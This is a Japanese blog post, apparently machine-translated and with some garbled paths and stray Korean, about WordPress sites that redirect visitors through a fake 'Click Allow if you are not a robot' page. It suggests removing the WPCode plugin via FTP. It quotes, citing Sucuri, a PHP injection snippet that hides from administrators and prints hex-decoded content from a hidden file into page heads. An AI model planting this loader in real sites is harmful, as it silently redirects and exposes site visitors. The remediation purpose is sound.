WordPress 「ロボットではないことを確認するには、ALLOWをクリックしてください」リダイレクトの問題

Last Updated: 2024 年 09 月 04 日 2のコメント

WordPress サイトにアクセスするとき 「ロボットではないことを確認するには、ALLOWをクリックしてください(Click Allow If You Are Not a Robot)」 画面が表示され、奇妙なサイトにリダイレクトされる問題が発生することがあります。このようなリダイレクトの問題は、プラグインなどを通じてマルウェア(リダイレクトコード)が注入されて現れることがあります。

WordPress 「ロボットではないことを確認するには、ALLOWをクリックしてください」リダイレクトの問題

WordPress 「ロボットではないことを確認するには、ALLOWをクリックしてください」リダイレクトの問題

WordPress サイト接続時に間欠的に上の図のような画像が表示され、奇妙なサイトに移動する問題が発生する場合があります。

このような異常動作に関してグーグルしてみると、コンピュータはTotalRecaptcha.topという アドウェア ウイルスに感染するとこの現象が発生するそうです。

アドウェアは、ユーザーが特定のソフトウェアを使用またはインストールしたときに自動的に広告を表示するプログラムを指します。これは主にフリーウェアでよく見られ、広告収入を通じて運営されるため、すべてのアドウェアは悪意のあるソフトウェアではありません。

WordPress サイトにこのような現象が発生した場合、マルウェアがプラグインなどを介して注入された可能性があります。

Reditの「Issues with my website - "Confirm youre not a robot「」でこのような問題について議論が上がってきたことがありますね。

サイトがハッキングされたようだからWordfenceでスキャンをしてみるという内容です。ワードフェンスでスキャンしても何も見つからなかったそうです。

セキュリティ会社であるSucuriの「How to Fix & Remove the “Click Allow If You Are Not a Robot” Redirect「というブログ記事でも同様の問題が紹介されています。この記事では、次のようなコードが任意のプラグインに注入されて発生する問題だそうです。

if ((is_admin() || (function_exists('get_hex_cache'))) !== true) {
        add_action('wp_head', 'get_hex_cache', 12);

        function get_hex_cache()
        {
            return print(@hex2bin( '3c7' . (file_get_contents(__DIR__  .'/_inc.tmp'))));
        }
    }

ただし、プラグインやテーマなどで疑わしいマルウェアをスキャンして治療を試しても問題が解決しないことがあります。

WPCode – Insert Headers and Footersプラグインを通じて悪性コードが注入されることが多いそうです。このプラグインを削除した後に問題が解決するかどうかを確認してください。

WPCodeは便利ですが、サイトがハッキングされたりマルウェアに感染したりして、このプラグインを通じてリダイレクトコード(マルウェア)が注入されることがあり、最近このような事例がしばしば報告されているそうです。

この問題に苦しんでいた方がFTPに接続してこのプラグインフォルダを削除すると問題が解決されたそうです。

セキュリティプラグイン、セキュリティツール全部やってみましたが、つかまえて探してよりが原因見つけましたね。 WP code Insert Headers and Footers プラグイン ご使用の方 僕のようなマルウェア現象の方はこのプラグインから見てください。

ここにリダイレクトコード(悪性マルウェア)が植えられており、このような事例がしばしば発見されますね。これはFTPに入って削除するので正常になりました。

ファイルジラなどを使って FTP / SFTPにアクセスしてプラグインフォルダを削除できます。このプラグインのパスは / WP-コンテンツ/plugins/inserte-headers-and-footers입니다。

このアクションでもリダイレクトの問題が解決しない場合 ここでサービス(有料)をご依頼することができます。

最後に、

サイトがマルウェアに感染して訪問したユーザーが奇妙なスパムサイトに移動すると、サイトの評判に影響を与える可能性があり、場合によってはGoogle Chromeから危険なサイトに分類され、ブロックされる可能性があります。

最近のマルウェアは、管理者としてアクセスするときには何の症状もなく、非ログインユーザーにのみ症状が現れることもあります。このため、管理者が遅すぎてサイトの問題を認識し、簡単に解決できる問題を時間を逃して苦労して解決する必要がある場合もあります。

この記事で紹介するマルウェアの場合、断続的に症状が現れることがあります。したがって、アクションを実行した後に問題が解決したかどうかを確認するのに時間がかかることがあります。

参照


2のコメント

コメント

  1. うわー、ありがとうございます。この問題のために何ヶ月も苦しんでいましたが、この情報を共有していただきありがとうございます。一度試してみて問題が解決されていない有料サービスを依頼します。

    応答
    • マルウェアの問題がうまく解決されることを願っています。ご質問がある場合は、以下のコメント Naver カフェでお問い合わせいただくと、わかる範囲内でお答えいたします。😄

      応答